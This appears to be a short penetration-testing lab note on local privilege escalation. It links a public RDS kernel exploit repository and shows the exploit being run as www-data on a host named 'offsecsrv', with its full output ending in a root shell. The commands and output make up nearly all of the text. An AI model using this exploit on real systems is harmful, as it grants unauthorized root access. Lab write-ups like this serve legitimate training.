7 privesc_1 rds

Using https://github.com/lucyoa/kernel-exploits/tree/master/rds
# 32 bit

www-data@offsecsrv:/tmp/k$ chmod +x rds
www-data@offsecsrv:/tmp/k$ ./rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc08c8c2c
 [+] Resolved default_security_ops to 0xc0773300
 [+] Resolved cap_ptrace_traceme to 0xc02f3dc0
 [+] Resolved commit_creds to 0xc016dcc0
 [+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# whoami;id;hostname
root
uid=0(root) gid=0(root)
offsecsrv

Last updated